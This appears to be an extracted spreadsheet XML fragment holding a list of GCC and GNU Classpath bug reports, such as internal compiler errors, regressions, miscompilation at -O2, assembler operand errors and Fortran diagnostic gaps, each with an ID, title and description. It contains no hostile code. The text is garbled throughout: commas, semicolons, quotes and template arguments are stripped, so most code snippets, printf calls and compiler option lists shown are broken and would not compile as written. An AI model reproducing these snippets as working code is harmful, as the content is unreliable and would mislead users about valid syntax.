/* Check that default mode is restored.  */
int8x8_t
my1 (int8x8_t __a int8x8_t __b)
{
  return __a + __b
}
/* { dg-final { scan-assembler-times \.fpu vfp 1 } } */
/* { dg-final { scan-assembler-times \.fpu neon 1 } } */
/* { dg-final { scan-assembler-times \.fpu crypto-neon-fp-armv8 1 } } */
/* { dg-final { scan-assembler-times vld1 1 } } */
/* { dg-final { scan-assembler-times vadd 1} } */
======================================
Compiling with /home/christophe.lyon/src/GCC/builds/gcc-fsf-arm-attribs/obj-arm-none-linux-gnueabihf/gcc3/gcc/xgcc -B/home/christophe.lyon/src/GCC/builds/gcc-fsf-arm-attribs/obj-arm-none-linux-gnueabihf/gcc3/gcc/ /home/christophe.lyon/src/GCC/sources/gcc-fsf/arm-attribs/gcc/testsuite/gcc.target/arm/attr-neon3.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -ffat-lto-objects -DSTACK_SIZE=16384 -S -o attr-neon3.s
GCC configured: --target=arm-none-linux-gnueabihf --with-float=hard --with-mode=arm --with-cpu=cortex-a9 --with-fpu=neon
Notice how the first function (my) is compiled with '.fpu vfp'</t>
  </si>
  <si>
    <t>GCC-70525</t>
  </si>
  <si>
    <t>generating 'vpandn' without the mode suffix gnu as fails to assemble (-mavx512bw)</t>
  </si>
  <si>
    <t>Created attachment 38174
reduced testcase
Output:
$ gcc -O -mavx512bw testcase.c
/tmp/ccuJjUxJ.s: Assembler messages:
/tmp/ccuJjUxJ.s:8: Error: operand type mismatch for `vpandn'
@@ -57 +57 @@
foo:                                                                              .LFB0:
        .cfi_startproc
-       vpandn  %zmm0 %zmm1 %zmm0
+       vpandnq %zmm0 %zmm1 %zmm0
        ret
        .cfi_endproc
 .LFE0:
Fixes the assembly (similar fix applies for the intel syntax). (vpandnd can be used as well)
Both the vpandnq and vpandnd instructions should be available in the foundation instruction set with -mavx512f but -mavx512bw is needed to force generation of the instruction. I will create a missed-optimization for this unless I am wrong.</t>
  </si>
  <si>
    <t>GCC-19101</t>
  </si>
  <si>
    <t>missing &amp; in character continuation not caught</t>
  </si>
  <si>
    <t>The following code is erroneous because
there's a &amp; missing in the continuation
line:
$ cat char-cont-wrong.f90
program main
  character (len=40) c
  c = Hello &amp;
       world!
  print *c
end program main
$ gfortran char-cont-wrong.f90
$ ./a.out
 Hello        world!
I think a diagnostic is needed for this case.</t>
  </si>
  <si>
    <t>GCC-38206</t>
  </si>
  <si>
    <t>g++ crashes when compiling trivial code (~10 line test case)</t>
  </si>
  <si>
    <t>The following code causes g++ to crash:
main.cpp:
==========================
struct foo {
   template  foo(T)
}
struct bar {
   bar()
   bar(const foo
   bar(bar
}
bar makeBar() {
   return bar()
}
==========================
&gt; g++ -v main.cpp
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)
 /usr/lib/gcc/i486-linux-gnu/4.2.4/cc1plus -quiet -v -D_GNU_SOURCE main.cpp -quiet -dumpbase main.cpp -mtune=generic -auxbase main -version -fstack-protector -fstack-protector -o /tmp/ccVkFN1G.s
ignoring nonexistent directory /usr/local/include/i486-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/i486-linux-gnu/4.2.4/../../../../i486-linux-gnu/include
ignoring nonexistent directory /usr/include/i486-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.2
 /usr/include/c++/4.2/i486-linux-gnu
 /usr/include/c++/4.2/backward
 /usr/local/include
 /usr/lib/gcc/i486-linux-gnu/4.2.4/include
 /usr/include
End of search list.
GNU C++ version 4.2.4 (Ubuntu 4.2.4-1ubuntu3) (i486-linux-gnu)
	compiled by GNU C version 4.2.4 (Ubuntu 4.2.4-1ubuntu3).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: cca9b7b48c023363b938f208576b99cc
g++: Internal error: Segmentation fault (program cc1plus)
Please submit a full bug report.
See  for instructions.
I've also tested g++ 3.3.3 with similar results.  Let me know if I can provide any further information!</t>
  </si>
  <si>
    <t>gredner</t>
  </si>
  <si>
    <t>GCC-8547</t>
  </si>
  <si>
    <t>JNI stubs not synchronized</t>
  </si>
  <si>
    <t>Compile a class with `-fjni'.
Native synchronized methods in that class won't
acquire a mutex.  (Interpreted native methods
work fine.)
One fix would be to add the appropriate synchronization
calls to the stub.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-83684</t>
  </si>
  <si>
    <t>[8 Regression] ICE in maybe_diag_overlap at gimple-ssa-warn-restrict.c:1371</t>
  </si>
  <si>
    <t>Created attachment 43036
preprocessed source
seen building courier 0.78 on x86_64-linux-gnu r256068.
while I get the preprocessed source from the ICE I'm unable to reproduce this using the preprocessed source.
libtool: compile:  gcc -DHAVE_CONFIG_H -I. -Wdate-time -D_FORTIFY_SOURCE=2 -g -O2 -fdebug-prefix-map=/home/
packages/tmp/gcc/courier-0.78.0=. -fstack-protector-strong -Wformat -Werror=format-security -Wall -pedantic
 -Wall -I./.. -I.. -I./../.. -I../.. -c maildirnewshared.c  -fPIC -DPIC -o .libs/maildirnewshared.o
during GIMPLE pass: strlen
maildirnewshared.c: In function 'maildir_newshared_next':
maildirnewshared.c:53:5: internal compiler error: in maybe_diag_overlap at gimple-ssa-warn-restrict.c:1371
 int maildir_newshared_next(struct maildir_newshared_enum_cb *info
     ^~~~~~~~~~~~~~~~~~~~~~
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-36036</t>
  </si>
  <si>
    <t>gcc emits uninitialized warnings from system headers.</t>
  </si>
  <si>
    <t>attached tarball contains small boost-1.35 based source and preprocessed file.
$ make ii
/local/devel/toolchain43/x86_64-gnu-linux/bin/x86_64-gnu-linux-g++ -c \
-pthread -Wall -O2 --save-temps \
-isystem ~/dvm/trunk/buildenv/linux/gcc-4.3/64/STLport-5.1.5/include/stlport \
-isystem ~/dvm/trunk/buildenv/linux/gcc-4.3/64/boost-stdc++-1.35.0/include \
2.cpp
/ahome/pawels/dvm/trunk/buildenv/linux/gcc-4.3/64/boost-stdc++-1.35.0/include/boost/lexical_cast.hpp: In function 'Target boost::detail::lexical_cast(typename boost::call_traits::param_type CharT* size_t) [with Target = int Source = stlp_std::basic_string stlp_std::allocator &gt; bool Unlimited = false CharT = boost::lexical_cast::char_type]':
/ahome/pawels/dvm/trunk/buildenv/linux/gcc-4.3/64/boost-stdc++-1.35.0/include/boost/lexical_cast.hpp:1147: warning: 'result' may be used uninitialized in this function
/ahome/pawels/dvm/trunk/buildenv/linux/gcc-4.3/64/boost-stdc++-1.35.0/include/boost/lexical_cast.hpp:1147: note: 'result' was declared here
-isystem should suppress all this magic diagnostics for boost headers.
ps). you can locate the 'result' by searching '# 1146' in .ii file.
gcc-4.3-20080417.</t>
  </si>
  <si>
    <t>GCC-70227</t>
  </si>
  <si>
    <t>pr69589 does not check for -rdynamic availability</t>
  </si>
  <si>
    <t>g++.dg/lto/pr69589 fails on trunk for arm-none-eabi target with the following error:
unrecognized command line option '-rdynamic'
The reason is that rdynamic is not an available option for bare metal targets. The test could add an effective target requirement to avoid creating a FAIL in such cases or possibly add an xfail for *-none-*.</t>
  </si>
  <si>
    <t>GCC-53557</t>
  </si>
  <si>
    <t>Cross compiling for m68k-linux fails as  doesn't exist</t>
  </si>
  <si>
    <t>Created attachment 27544
fix cross build
Cross compiling for m68k-linux fails as  doesn't exist although a fallback solution exists in libgcc/config/m68k/linux-atomic.c
I will attach more information including the logs later.</t>
  </si>
  <si>
    <t>GCC-40166</t>
  </si>
  <si>
    <t>[4.4/4.5 regression] Ada compiler unable to build libraries</t>
  </si>
  <si>
    <t>Due to the change given below. Ada compiler under all platforms is no longer able to build libraries. The path to TOOLS_TARGET_PAIRS is incorrect in gnattools/Makefile.in resulting in the use of the dummy mlib-tgt-specific.adb for all platforms.
------------------------------------------------------------------------
r144463 | schwab | 2009-02-27 10:54:25 +0100 (Ven 27 fÃ©v 2009) | 12 lines
gnattools/:
	* Makefile.in (fsrcdir): Point to gcc directory not gcc/ada.
	(INCLUDES_FOR_SUBDIR): Adjust.
	(ADA_INCLUDES_FOR_SUBDIR): Adjust.</t>
  </si>
  <si>
    <t>bechir.zalila</t>
  </si>
  <si>
    <t>GCC-63325</t>
  </si>
  <si>
    <t>[5.0 regression] ICE fold check: original tree changed by fold</t>
  </si>
  <si>
    <t>r215401 PASS
r215427 r215444 FAIL
Fedora 20 / x86_64
$ configure --enable-checking=fold
$ make
[...]
/home/dimhen/build/gcc_current/./gcc/xgcc -B/home/dimhen/build/gcc_current/./gcc/ -B/usr/local/gcc_current/x86_64-unknown-linux-gnu/bin/ -B/usr/local/gcc_current/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/gcc_current/x86_64-unknown-linux-gnu/include -isystem /usr/local/gcc_current/x86_64-unknown-linux-gnu/sys-include    -g -O2 -m32 -O2  -g -O2 -DIN_GCC    -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -fpic -mlong-double-80 -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -fpic -mlong-double-80 -I. -I. -I../../.././gcc -I/home/dimhen/src/gcc_current/libgcc -I/home/dimhen/src/gcc_current/libgcc/. -I/home/dimhen/src/gcc_current/libgcc/../gcc -I/home/dimhen/src/gcc_current/libgcc/../include -I/home/dimhen/src/gcc_current/libgcc/config/libbid -DENABLE_DECIMAL_BID_FORMAT -DHAVE_CC_TLS  -DUSE_TLS -o generic-morestack.o -MT generic-morestack.o -MD -MP -MF generic-morestack.dep  -c /home/dimhen/src/gcc_current/libgcc/generic-morestack.c -fvisibility=hidden -DHIDE_EXPORTS
/home/dimhen/src/gcc_current/libgcc/generic-morestack.c: In function '__morestack_block_signals':
/home/dimhen/src/gcc_current/libgcc/generic-morestack.c:675:3: internal compiler error: fold check: original tree changed by fold
   else if (pthread_sigmask)
   ^
0x9e0512 fold_check_failed
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14554
0x9e0407 fold(tree_node*)
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14531
0x6f9719 c_fully_fold_internal
	/home/dimhen/src/gcc_current/gcc/c-family/c-common.c:1309
0x6f8865 c_fully_fold(tree_node* bool bool*)
	/home/dimhen/src/gcc_current/gcc/c-family/c-common.c:1101
0x6d4ada c_parser_condition
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5052
0x6d4b38 c_parser_paren_condition
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5069
0x6d4f01 c_parser_if_statement
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5170
0x6d43b9 c_parser_statement_after_labels
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:4888
0x6d4e61 c_parser_else_body
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5144
0x6d4f8d c_parser_if_statement
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:5178
0x6d43b9 c_parser_statement_after_labels
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:4888
0x6d3e76 c_parser_compound_statement_nostart
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:4650
0x6d38a1 c_parser_compound_statement
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:4487
0x6ce7d2 c_parser_declaration_or_fndef
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:1946
0x6cd462 c_parser_external_declaration
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:1416
0x6cd0e5 c_parser_translation_unit
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:1303
0x6ed98a c_parse_file()
	/home/dimhen/src/gcc_current/gcc/c/c-parser.c:14322
0x7533a7 c_common_parse_file()
	/home/dimhen/src/gcc_current/gcc/c-family/c-opts.c:1043
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make[5]: *** [generic-morestack.o] Error 1
make[5]: Leaving directory `/home/dimhen/build/gcc_current/x86_64-unknown-linux-gnu/32/libgcc'
make[4]: *** [multi-do] Error 1
make[4]: Leaving directory `/home/dimhen/build/gcc_current/x86_64-unknown-linux-gnu/libgcc'
make[3]: *** [all-multi] Error 2
make[3]: Leaving directory `/home/dimhen/build/gcc_current/x86_64-unknown-linux-gnu/libgcc'
make[2]: *** [all-stage1-target-libgcc] Error 2
make[2]: Leaving directory `/home/dimhen/build/gcc_current'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/home/dimhen/build/gcc_current'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-8671</t>
  </si>
  <si>
    <t>gcc version 2.95.3 passing parameters bug</t>
  </si>
  <si>
    <t>third parameter passed to a function is one after the function call inside the fuction it's printed and it is 0. the parameter is passed incorectly. see the source it's very very simple. the bug appears when compiling with -O2 switch. just try gcc -O2 -o zoom zoom.c
Release:
gcc version 2.95.3 20010315
Environment:
Slackware Linux Pentium III</t>
  </si>
  <si>
    <t>_hristo_</t>
  </si>
  <si>
    <t>GCC-9853</t>
  </si>
  <si>
    <t>[3.2 regression] miscompilation of non-constant structure initializer</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
Environment:
Linux turtle.rainfinity.prv 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux</t>
  </si>
  <si>
    <t>mas</t>
  </si>
  <si>
    <t>GCC-46122</t>
  </si>
  <si>
    <t>PROTECTED check too strict</t>
  </si>
  <si>
    <t>gfortran rejects valid
  %
references cf. OK 3 and OK 4 below.
The test case was created by Jared Ahern and the issue was reported to http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/6a866eb893ad8473
Note: The OK/Invalid lines are according to my understanding no guarantee that those are correct.
MODULE amod
   IMPLICIT NONE
   TYPE foo
      INTEGER :: i = 4
      INTEGER POINTER :: j =&gt; NULL()
   END TYPE foo
   TYPE(foo) SAVE PROTECTED :: a
   TYPE(foo) SAVE PROTECTED POINTER :: b
   INTEGER SAVE PROTECTED :: i = 5
   INTEGER SAVE PROTECTED POINTER :: j =&gt; NULL()
contains
  subroutine alloc()
    allocate(bj)
  end subroutine alloc
END MODULE amod
PROGRAM test
   USE amod
   IMPLICIT NONE
   INTEGER TARGET :: k
   TYPE(foo) TARGET :: c
   k = 2   ! local
   c%i = 9 ! local
   call alloc()
   ! In parentheses: compiler gives error for that line
   ! gfortran 4.6/Oct g95 Aug 2010 NAG 5.1 ifort 11.1
   ! pathf95 3.2.99 PGI 10.5 (compiles without error) crayftn 
   i = k    ! Invalid 1  (gfortran  NAG  g95  ifort  pathf95  cray)
   j =&gt; k   ! Invalid 2  (gfortran       g95  ifort  pathf95  cray)
   j = 3    ! OK 1       (                    ifort  pathf95  cray)
   a = c    ! Invalid 3  (gfortran  NAG  g95  ifort  pathf95  cray)
   a%i = k  ! Invalid 4  (gfortran  NAG  g95  ifort  pathf95  cray)
   a%j =&gt; k ! Invalid 5  (gfortran  NAG  g95  ifort  pathf95  cray)
   a%j = 5  ! OK 2       (               g95  ifort  pathf95  cray)
   b =&gt; c   ! Invalid 6  (gfortran       g95  ifort  pathf95  cray)
   b%i = k  ! OK 3       (gfortran            ifort   [bug]   cray)
   b%j =&gt; k ! OK 4       (gfortran       g95  ifort   [bug]   cray)
   b%j = 5  ! OK 5       (                    ifort   [bug]   cray)
END PROGRAM test</t>
  </si>
  <si>
    <t>GCC-25481</t>
  </si>
  <si>
    <t>[4.2 Regression] Segfault in tree-ssa-structalias.c</t>
  </si>
  <si>
    <t>Compiling the following test case with ./cc1 -O2 ends up causing a segfault.
struct s {
  int *blah
}
static struct s array[] = {
  { 0 }
}
void
foo (struct s *p)
{
  unsigned int n = 1
  struct s *q = 
  while (p &lt; q)
    p++
}</t>
  </si>
  <si>
    <t>GCC-13997</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Error while matching partial specialization of array type</t>
  </si>
  <si>
    <t>Another regression from Boost this time is the Type Traits library. Minimized 
as follows (with the help of John Maddock):
--------------------------------------------
template 
struct is_array {}
template 
struct is_array {}
template 
struct is_array {}
template struct is_array
--------------------------------------------
$ g++-3.4 -c is_array.cc
is_array.cc:10: error: size of array is not an integral constant-expression
is_array.cc:10: error: size of array is not an integral constant-expression
The problem seems that at unification time the domain of the array type is a 
(NON_LVALUE_EXPR (NOP_EXPR (INTEGER_CST))) and the substitution code doesn't 
seem to handle it. No clue about why.</t>
  </si>
  <si>
    <t>GCC-84151</t>
  </si>
  <si>
    <t>[6 Regression] g++ generates two identical loads in a volatile-qualified member function.</t>
  </si>
  <si>
    <t>The g++ generates two identical loads when the foo member function is called in the following test case:
struct A {
    static int&amp; bar(int&amp; a) {
        return a
    }
    int foo() volatile {
        int v = c
        return bar(v)
    }
    int c
}
A a
int main() {
    a.c = 2
    a.foo()
    return 0
}
The -O2 options is used to get the following assembler:
	.file	test_atomic.cpp
	.section	.text.startupax@progbits
	.p2align 415
	.globl	main
	.type	main @function
main:
.LFB2:
	.cfi_startproc
	movl	$2 a(%rip)
	movl	a(%rip) %eax    
	movl	a(%rip) %eax  // !!!DUPLICATED
	xorl	%eax %eax
	ret
	.cfi_endproc
.LFE2:
	.size	main .-main
	.globl	a
	.bss
	.align 4
	.type	a @object
	.size	a 4
a:
	.zero	4
	.ident	GCC: (GNU) 7.2.1 20170915 (Red Hat 7.2.1-2)
	.section	.note.GNU-stack@progbits
The movl a(%rip) %eax line is repeated twice. The https://godbolt.org/g/yhQtDw reproduces the issue on many versions newer 4.8.</t>
  </si>
  <si>
    <t>wasing</t>
  </si>
  <si>
    <t>GCC-15384</t>
  </si>
  <si>
    <t>Lines witout effect in t-m68hc11-gas file</t>
  </si>
  <si>
    <t>File gcc/config/m68hc11/t-m68hc11-gas (all revisions in the CVS tree are
affected) contains following lines:
dp-bit.c: $(srcdir)/config/fp-bit.c
        echo '#define SMALL_MACHINE' &gt;&gt; dp-bit.c
        echo '#define CMPtype HItype' &gt;&gt; dp-bit.c
        echo '#ifdef __LITTLE_ENDIAN__' &gt; dp-bit.c
        echo '#define FLOAT_BIT_ORDER_MISMATCH' &gt;&gt;dp-bit.c
        echo '#endif'                 &gt;&gt; dp-bit.c
        cat $(srcdir)/config/fp-bit.c &gt;&gt; dp-bit.c
The first and second 'echo' lines have no effect (please note '&gt;' in the third
line). 
Please note that I've no experience with m68hc11 target. I've found the bug
while reading the gcc sources.
Thanks.</t>
  </si>
  <si>
    <t>ciceron</t>
  </si>
  <si>
    <t>GCC-18852</t>
  </si>
  <si>
    <t>[3.4 Regression] 8 tests fail: SIGSEGV for stack growth failure</t>
  </si>
  <si>
    <t>We have the following new fails in the C testsuite:
Running /xxx/gnu/gcc-3.4/gcc/gcc/testsuite/gcc.dg/compat/compat.exp ...
FAIL: gcc.dg/compat/scalar-by-value-4 c_compat_x_tst.o compile
FAIL: gcc.dg/compat/scalar-by-value-4 c_compat_y_tst.o compile
FAIL: gcc.dg/compat/scalar-return-4 c_compat_x_tst.o compile
FAIL: gcc.dg/compat/scalar-return-4 c_compat_y_tst.o compile
FAIL: gcc.dg/compat/struct-by-value-11 c_compat_x_tst.o compile
FAIL: gcc.dg/compat/struct-by-value-11 c_compat_y_tst.o compile
FAIL: gcc.dg/compat/struct-by-value-12 c_compat_x_tst.o compile
FAIL: gcc.dg/compat/struct-by-value-12 c_compat_y_tst.o compile
All these fail due SIGSEGVs:
Executing on host: /xxx/gnu/gcc-3.4/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.4/objdir/gc
c/    -c  -o c_compat_x_tst.o /xxx/gnu/gcc-3.4/gcc/gcc/testsuite/gcc.dg/compat/s
calar-by-value-4_x.c    (timeout = 300)
^M
Pid 21061 received a SIGSEGV for stack growth failure.^M
Possible causes: insufficient memory or swap space^M
or stack size exceeded maxssiz.^M
xgcc: Internal error: Segmentation fault (program cc1)
Please submit a full bug report.</t>
  </si>
  <si>
    <t>GCC-48362</t>
  </si>
  <si>
    <t>pretty printer fails for zero-size std::tuple</t>
  </si>
  <si>
    <t>trying to print a std::tuple fails
(gdb) ptype t
type = class std::tuple {
  public:
    void swap(std::tuple 
}
(gdb) p t
$1 = std::tuple containingTraceback (most recent call last):
  File /home/wakelj/tools/Linux-x86_64/test/share/gcc-4.6.0/python/libstdcxx/v6/printers.py line 290 in children
    return self._iterator (self.val)
  File /home/wakelj/tools/Linux-x86_64/test/share/gcc-4.6.0/python/libstdcxx/v6/printers.py line 248 in __init__
    raise ValueError Top of tuple tree does not consist of a single node.
ValueError: Top of tuple tree does not consist of a single node.
The following patch is a quick hack to prevent the error but produces the unhelpful output:
(gdb) p t
$1 = std::tuple containing
(gdb)
--- python/libstdcxx/v6/printers.py.orig        2011-03-30 11:44:33.786660891 +0000
+++ python/libstdcxx/v6/printers.py     2011-03-30 11:46:33.570222630 +0000
@@ -2446 +24410 @@
             # Set the base class as the initial head of the
             # tuple.
             nodes = self.head.type.fields ()
+            if len (nodes) == 0:
+                self.count = -1
+                return
+
             if len (nodes) != 1:
                 raise ValueError Top of tuple tree does not consist of a single node.
@@ -2556 +2598 @@
             return self
         def next (self):
+            if self.count == -1:
+                raise StopIteration
             nodes = self.head.type.fields ()
             # Check for further recursions in the inheritance tree.
             if len (nodes) == 0:</t>
  </si>
  <si>
    <t>CLASSPATH-27206</t>
  </si>
  <si>
    <t>Navigationfilter integration - endless recursive loop</t>
  </si>
  <si>
    <t>Try the NavigationFilter example in the Swing Activity board. It will cause that loop.</t>
  </si>
  <si>
    <t>GCC-1476</t>
  </si>
  <si>
    <t>compiler allows assignment to interface constants</t>
  </si>
  <si>
    <t xml:space="preserve">State-Changed-From-To: open-&gt;feedback
State-Changed-Why: There is a patch.
</t>
  </si>
  <si>
    <t>GCC-17482</t>
  </si>
  <si>
    <t>[4.0 Regression] GCSE after reload replacing changing instructions</t>
  </si>
  <si>
    <t>gfortran.fortran-testsuite/execute/retarray_2.f90
GCSE2 is deleting instructions that appear to be identical.  The problem is that
the address register is being updated by a PRE_INC yet GCSE2 apparently
believes the value is unchanging
expr: (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
        (reg:SI 0 0 [135])) [5 S4 A8])
hashcode: 8826
list of occurences:
(insn:HI 45 44 46 1 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t:REG_DEP_ANTI 113 (insn_list:REG_DEP_OUTPUT 112 (insn_list 111 (insn_list 96 (i
nsn_list 44 (insn_list:REG_DEP_ANTI 114 (insn_list:REG_DEP_ANTI 84 (insn_list 13
2 (insn_list:REG_DEP_ANTI 99 (insn_list:REG_DEP_ANTI 25 (nil)))))))))))
    (nil))
(insn:HI 82 85 81 4 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t 132 (insn_list:REG_DEP_ANTI 25 (nil)))
    (nil))
(insn:HI 97 96 98 5 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t:REG_DEP_ANTI 83 (insn_list:REG_DEP_OUTPUT 82 (insn_list 96 (insn_list:REG_DEP_
ANTI 84 (insn_list 132 (insn_list:REG_DEP_ANTI 25 (nil)))))))
    (nil))
(insn:HI 112 111 113 6 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t:REG_DEP_ANTI 98 (insn_list:REG_DEP_OUTPUT 97 (insn_list 96 (insn_list 111 (ins
n_list:REG_DEP_ANTI 99 (insn_list 132 (insn_list:REG_DEP_ANTI 84 (insn_list:REG_
DEP_ANTI 25 (nil)))))))))
    (nil))
generating move from 9 to 9 on edge from 6 to 1
generating move from 9 to 9 on edge from 4 to 5
generating move from 9 to 9 on edge from 5 to 6
deleting insn:
(insn/v:HI 45 44 46 1 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t:REG_DEP_ANTI 113 (insn_list:REG_DEP_OUTPUT 112 (insn_list 111 (insn_list 96 (i
nsn_list 44 (insn_list:REG_DEP_ANTI 114 (insn_list:REG_DEP_ANTI 84 (insn_list 13
2 (insn_list:REG_DEP_ANTI 99 (insn_list:REG_DEP_ANTI 25 (nil)))))))))))
    (nil))
deleting insn:
(insn/v:HI 97 96 98 5 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t:REG_DEP_ANTI 83 (insn_list:REG_DEP_OUTPUT 82 (insn_list 96 (insn_list:REG_DEP_
ANTI 84 (insn_list 132 (insn_list:REG_DEP_ANTI 25 (nil)))))))
    (nil))
deleting insn:
(insn/v:HI 112 111 113 6 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t:REG_DEP_ANTI 98 (insn_list:REG_DEP_OUTPUT 97 (insn_list 96 (insn_list 111 (ins
n_list:REG_DEP_ANTI 99 (insn_list 132 (insn_list:REG_DEP_ANTI 84 (insn_list:REG_
DEP_ANTI 25 (nil)))))))))
    (nil))
GCSE AFTER RELOAD stats:
copies inserted: 0
moves inserted:  3
insns deleted:   3
Deleted 3 trivially dead insns 2 iterations
In the previous pass 24.postreload one sees that r29 was incremented:
(insn:HI 111 109 112 6 (set (reg:SI 11 11 [136])
        (mem/s:SI (pre_inc:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])) [5 b 
S4 A8])) 265 {*movsi_internal1} (insn_list:REG_DEP_ANTI 98 (insn_list:REG_DEP_AN
TI 97 (insn_list:REG_DEP_ANTI 81 (insn_list:REG_DEP_ANTI 82 (insn_list 96 (insn_
list:REG_DEP_ANTI 99 (insn_list 132 (insn_list:REG_DEP_ANTI 84 (insn_list:REG_DE
P_ANTI 25 (nil))))))))))
    (expr_list:REG_INC (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
        (nil)))
(insn:HI 112 111 113 6 (set (reg:SI 9 9 [137])
        (mem/s:SI (plus:SI (reg/f:SI 29 29 [orig:118 ivtmp.43 ] [118])
                (reg:SI 0 0 [135])) [5 S4 A8])) 265 {*movsi_internal1} (insn_lis
t:REG_DEP_ANTI 98 (insn_list:REG_DEP_OUTPUT 97 (insn_list 96 (insn_list 111 (ins
n_list:REG_DEP_ANTI 99 (insn_list 132 (insn_list:REG_DEP_ANTI 84 (insn_list:REG_
DEP_ANTI 25 (nil)))))))))
    (nil))</t>
  </si>
  <si>
    <t>GCC-5264</t>
  </si>
  <si>
    <t>Possible optimization bug at -O2 on HP-UX</t>
  </si>
  <si>
    <t>A possible optimization bug at -O2 on HP-UX found in building
R (Gnu S).  Simplified program:
 ---------------(opttest.c)--------------------------------------------#include 
double x[] = { 1.0 2.0} y[] = { 1.0 2.0 } z[2]
main()
{
  int i i1 i2 n n1 n2
  i1 = i2 = 0
  n = n1 = n2 = 2
  for (i = 0 i &lt; n i++) {
    z[i] = x[i1] + y[i2]
    i1 = (++i1 == n1) ? 0 : i1
    i2 = (++i2 == n2) ? 0 : i2
  }
  printf(z[1] = %g\n z[1])
}
----------------------------------------------------------------------
Without optimization or with just -O it works fine:
tierney@bass [125]% gcc -o opttest opttest.c
ltierney@bass [126]% ./opttest 
z[1] = 4ltierney@bass [127]% gcc -O -o opttest opttest.c
ltierney@bass [128]% ./opttest
z[1] = 4
But with -O2 it gets the wrong answer:
ltierney@bass [129]% gcc -O2 -o opttest opttest.c
ltierney@bass [130]% ./opttest
z[1] = 2
Please let me know if you need additional info.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
HP-UX bass B.11.00 A 9000/780 2007851940
How-To-Repeat:
On HP-UX compare output of
gcc -O2 -o opttest opttest.c ./opttest
gcc -O -o opttest opttest.c ./opttest</t>
  </si>
  <si>
    <t>luke</t>
  </si>
  <si>
    <t>GCC-37101</t>
  </si>
  <si>
    <t>[4.2 Regression] wrong code: tree vectorizer omits bogus movq/movlps construct</t>
  </si>
  <si>
    <t>(see http://bugs.gentoo.org/show_bug.cgi?id=227311 )
Seeing this on my (amd64) gcc 4.3.1 in xorg-server code dix/resource.c with -O2 -march=nocona -ftree-vectorize.
( gcc -O2 -march=nocona -ftree-vectorize -o resource.o -c resource.i )
